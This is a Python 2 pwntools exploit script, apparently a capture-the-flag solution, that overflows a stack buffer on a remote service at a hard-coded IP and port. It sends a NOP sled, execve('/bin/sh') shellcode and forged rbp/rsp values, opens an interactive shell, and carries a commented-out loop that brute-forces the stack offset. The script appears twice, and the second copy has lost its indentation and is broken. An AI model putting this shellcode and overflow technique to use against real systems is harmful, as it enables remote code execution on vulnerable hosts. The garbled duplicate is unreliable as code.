mjonasz/aleph1

## aleph1
#!/usr/bin/env python2

from pwn import *
from struct import pack,unpack

context(arch = 'i386', os = 'linux')#, log_level='debug')
def connect(offset):
    #x = process('./vuln')
    x = remote('35.205.206.137','1996')
    #raw_input("klik")
    #x.recv()

    a = '\x90' * (0x300-27)
    a += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
    a += 'b'*0x100
    rsp_end = 0x7fffffff0000
    addr = rsp_end + offset * 0x100
    rsp = pack("<Q", addr-0x400)
    rbp = pack("<Q", addr)
    a += rbp + rsp
    x.sendline(a)
    #x.sendline()
    x.sendline('echo dupa')
    out = x.recvline(timeout=1)
    print format(addr, '16x')
    #ireturn 'dupa' in out
    x.interactive()
connect(0xee)
'''
for x in range(0,0xff):
    print 'trying ' + str(x)
    try:
        if connect(x):
            break
    except EOFError:
        pass
'''
	#!/usr/bin/env python2

	from pwn import *
	from struct import pack,unpack

	context(arch = 'i386', os = 'linux')#, log_level='debug')
	def connect(offset):
	#x = process('./vuln')
	x = remote('35.205.206.137','1996')
	#raw_input("klik")
	#x.recv()

	a = '\x90' * (0x300-27)
	a += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
	a += 'b'*0x100
	rsp_end = 0x7fffffff0000
	addr = rsp_end + offset * 0x100
	rsp = pack("<Q", addr-0x400)
	rbp = pack("<Q", addr)
	a += rbp + rsp
	x.sendline(a)
	#x.sendline()
	x.sendline('echo dupa')
	out = x.recvline(timeout=1)
	print format(addr, '16x')
	#ireturn 'dupa' in out
	x.interactive()
	connect(0xee)
	'''
	for x in range(0,0xff):
	print 'trying ' + str(x)
	try:
	if connect(x):
	break
	except EOFError:
	pass
	'''